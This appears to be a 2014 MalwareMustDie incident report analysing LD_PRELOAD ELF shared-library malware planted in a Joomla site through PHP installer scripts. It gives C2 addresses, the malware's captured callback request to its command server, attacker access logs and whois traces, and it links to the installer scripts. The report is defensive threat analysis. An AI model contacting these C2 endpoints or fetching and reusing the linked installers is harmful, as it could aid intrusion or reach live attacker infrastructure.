Raw text of current incident report is in here -->>[MMD Pastebin] and-->>[MMD Pastebin], for the video tutorial to extract, kill, debug & traffic capture ELF .so shared library malware that's using LD_PRELOAD is in here-->>[MMD Blog]
..and below is the current incident textual contents:
MalwareMustDie NEW Report of .SO ELF Malware attack incident. date: Wed Jun 11 06:38:13 JST 2014 Analysis by @unixfreaxjp - Report & source investigation thx to: yin Case: http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html CNC is ALIVE in : "89.45.14.64 (VOXILITY, ROMANIA)" ATTACKER SOURCE IP: "103.31.186.33 (VOXILITY, ROMANIA) & 31.202.247.234 (Leased line ISP Format, UKRAINE)" //------------------------------------- // PHP HACK INJECTION POC // VICTIMS WEBAPP: JOOMLA! //------------------------------------- // Reported Injected installation .SO Bins https://www.virustotal.com/en/file/324b1b77ff9c0759e3d2ab1efb9439a3a850d94bd9f1968a0f093a782b5ea990/analysis/1402437076/ https://www.virustotal.com/en/file/203eeac48d08cac9b36187bfb32bd88d29f1f44d4306f2ffc154538573e5d722/analysis/1402437106/ // Jinxed code installer PHP scripts in pastebin: http://pastebin.com/z1K8jxKJ http://pastebin.com/Pbsk3ZXU // Malware Binaries extracted from installer PHP: https://www.virustotal.com/en/file/c28e2ebc5046c1a03a8f689b757cf2a90d021eeaa0a5e9ec91aa33c76ee6237f/analysis/1402437331/ https://www.virustotal.com/en/file/af71138bc3b2e70fd1d8fd33c31a4707d686d893661a331aee68f223348e164e/analysis/1402437372/ //------------------------------------- // CNC ANALYSIS // Using knowhow from: http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html //------------------------------------- // Extract the bins w/ template: $ date Wed Jun 11 04:12:11 JST 2014 $ $ php ./sodump-template.php SO x32 dumped 26848 SO x64 dumped 27288 MO x32 dumped 26848 MO x64 dumped 27288 $ $ ls -alF total 600 drwxrwxrwx 2 xxx xxx 512 Jun 11 04:12 ./ drwxrwxrwx 13 xxx xxx 512 Jun 11 03:59 ../ -rw-r--r-- 1 xxx xxx 26848 Jun 11 04:12 "libworker1-32.so" -rw-r--r-- 1 xxx xxx 27288 Jun 11 04:12 "libworker1-64.so" -rw-r--r-- 1 xxx xxx 26848 Jun 11 04:12 "libworker2-32.so" -rw-r--r-- 1 xxx xxx 27288 Jun 11 04:12 "libworker2-64.so" $ md5 lib* MD5 (libworker1-32.so) = 15584bc865d01b7adb7785f27ac60233 MD5 (libworker1-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21 MD5 (libworker2-32.so) = 15584bc865d01b7adb7785f27ac60233 MD5 (libworker2-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21 // noted see only one x32 and one x64 binaries used for multiple injection.. $ file lib* libworker1-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped libworker1-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped libworker2-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped libworker2-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped $ // CNC: POST /kuku/theend.php HTTP/1.0 Host: erstoryunics.us Pragma: 1337 Content-Length: 84 R,20130826,64,0,,UNIX SCO System - MalwareMustDie Bangs Moronz CNC, HTTP/1.1 200 OK Date: Tue, 10 Jun 2014 22:12:22 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Content-Length: 6 Connection: close Content-Type: text/html; charset=UTF-8 R,200 // CNC INFO (NETWORK & GEOIP) $ echo `dig +short erstoryunics.us`|bash origin.sh Wed Jun 11 06:28:03 JST 2014|89.45.14.64||39743 | 89.45.14.0/24 | VOXILITY | MD | - | IM INTERNET MEDIA SRL IP Address, City, Country Name, Latitude, longitude, Time Zone 89.45.14.64, , Romania, 46.0, 25.0, Europe/Bucharest //------------------------------------- // ATTACK TIME RANGE: //------------------------------------- First session: "[22/May/2014:13:01:08 +1000]" 2nd Session First: "[09/Jun/2014:07:50:46 +1000]" 2nd Session Latest:"[10/Jun/2014:04:39:51 +1000]" //------------------------------------- // ATTACKER ACCESS POC & SOURCE IP POC: //------------------------------------- // Attacker access log aiming the PHP .SO Malware installer PHP script: 103.31.186.33 - - [09/Jun/2014:07:50:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-" 103.31.186.33 - - [10/Jun/2014:03:34:23 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-" 103.31.186.33 - - [10/Jun/2014:04:10:30 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-" 103.31.186.33 - - [10/Jun/2014:04:39:51 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-" 103.31.186.33 - - [08/Jun/2014:07:56:45 +1000] "GET /cache.php HTTP/1.0" 200 71 "-" "-" 103.31.186.33 - - [08/Jun/2014:19:50:28 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-" 103.31.186.33 - - [08/Jun/2014:21:39:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-" 103.31.186.33 - - [08/Jun/2014:22:10:14 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-" 103.31.186.33 - - [08/Jun/2014:06:25:18 +1000] "GET /jquery.js.php HTTP/1.0" 200 71 "-" "-" 31.202.247.234 - - [22/May/2014:13:01:08 +1000] "GET /cache/cache.php HTTP/1.1" 200 17943 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1" //------------------------------------- Tracing attacker source IP: "103.31.186.33 (ROMANIA)" //------------------------------------- $ whois 103.31.186.33 % [whois.apnic.net] % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html % Information related to '103.31.186.0 - 103.31.186.127' inetnum: 103.31.186.0 - 103.31.186.127 netname: Saulhost descr: Saulhost Hosting country: RO admin-c: MT669-AP tech-c: MT669-AP status: ASSIGNED NON-PORTABLE remarks: INFRA-AW mnt-by: MAINT-HK-VOXILITY mnt-lower: MAINT-HK-VOXILITY mnt-routes: MAINT-HK-VOXILITY mnt-irt: IRT-VOXILITY-AP changed: noc@voxility.com 20130118 source: APNIC irt: IRT-VOXILITY-AP address: Dimitrie Pompeiu 9-9A address: Building 24 address: Bucharest 020335 address: Romania e-mail: noc@voxility.com abuse-mailbox: noc@voxility.com admin-c: VOX100 tech-c: VOX100 auth: # Filtered mnt-by: MAINT-HK-VOXILITY changed: noc@voxility.com 20121015 source: APNIC person: Michael Ter-Sahakyan address: Terbatas 14 address: LV-1011 Riga address: Latvia country: RO phone: +37166163312 e-mail: abuses@saulhost.com nic-hdl: MT669-AP remarks: INFRA-AW abuse-mailbox: abuses@saulhost.com mnt-by: MAINT-HK-VOXILITY changed: noc@voxility.com 20130118 source: APNIC //------------------------------------- Tracing attacker source IP: "31.202.247.234 (UKRAINE)" //------------------------------------- $ whois 31.202.247.234 % This is the RIPE Database query service. % The objects are in RPSL format. % % The RIPE Database is subject to Terms and Conditions. % See http://www.ripe.net/db/support/db-terms-conditions.pdf % Note: this output has been filtered. % To receive output for a database update, use the "-B" flag. % Information related to '31.202.192.0 - 31.202.255.255' % Abuse contact for '31.202.192.0 - 31.202.255.255' is 'abuse@maxnet.ua' inetnum: 31.202.192.0 - 31.202.255.255 netname: FORMAT-TV-NET-5 descr: MSP Format Ltd. country: UA admin-c: FA4288-RIPE tech-c: FA4288-RIPE status: ASSIGNED PA mnt-by: FORMAT-TV-MNT mnt-domains: FORMAT-TV-MNT mnt-routes: FORMAT-TV-MNT source: RIPE # Filtered person: Format Admin address: Ukraine Mariupol phone: +380629422490 nic-hdl: FA4288-RIPE mnt-by: FORMAT-TV-MNT source: RIPE # Filtered % Information related to '31.202.247.0/24AS6712' route: 31.202.247.0/24 descr: Leased line ISP Format origin: AS6712 mnt-by: FORMAT-TV-MNT source: RIPE # FilteredCNC callback screenshot (the second take) :
#MalwareMustDie!
